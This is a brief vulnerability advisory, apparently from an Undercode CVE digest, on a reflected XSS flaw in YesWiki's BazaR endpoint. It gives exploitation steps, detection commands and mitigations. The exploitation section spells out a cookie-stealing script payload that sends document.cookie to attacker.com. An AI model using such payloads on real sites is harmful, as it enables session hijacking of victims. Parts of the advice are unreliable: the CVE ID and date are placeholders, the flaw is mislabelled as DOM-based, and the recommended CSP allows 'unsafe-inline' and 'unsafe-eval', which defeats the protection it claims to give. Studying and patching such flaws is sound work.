YesWiki, Cross-Site Scripting (XSS), CVE-2023-XXXX (Medium)

How the CVE Works

This vulnerability in YesWiki (< v4.5.4) allows Reflected XSS via the `idformulaire` parameter in the `/BazaR` endpoint. The application fails to sanitize user-supplied input, enabling attackers to inject arbitrary JavaScript. When a victim visits a crafted URL (e.g., https://yeswiki.net/?BazaR&vue=formulaire&action=confirm_delete&idformulaire=<script>alert(1)</script>), the payload executes in their browser. The lack of output encoding or validation in the `idformulaire` parameter leads to DOM-based script execution, compromising session tokens or delivering malware.

DailyCVE Form

Platform: YesWiki
Version: <4.5.4
Vulnerability: XSS
Severity: Medium
Date: 2023-XX-XX

What Undercode Say:

Exploitation:

1. Craft malicious URL:

https://yeswiki.net/?BazaR&vue=formulaire&action=confirm_delete&idformulaire=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

2. Social-engineer victim to click the link.

Detection:

  • Use automated scanners (e.g., Burp Suite, ZAP):
    python3 xsstrike.py -u "https://yeswiki.net/?BazaR&idformulaire=test"
    
  • Manual testing:
    curl -s "https://yeswiki.net/?BazaR&idformulaire=<script>confirm(1)</script>" | grep "<script>"
    

Mitigation:

1. Update to YesWiki ≥4.5.4.

2. Implement input sanitization:

$idformulaire = htmlspecialchars($_GET['idformulaire'], ENT_QUOTES, 'UTF-8');

3. Deploy CSP headers:

Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' 'unsafe-eval'

Analytics:

  • CVSS Breakdown:
  • Attack Vector (AV:N): Network-exploitable.
  • Impact (I:L): Integrity compromised.
  • Exploitability: Low skill required.

References:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top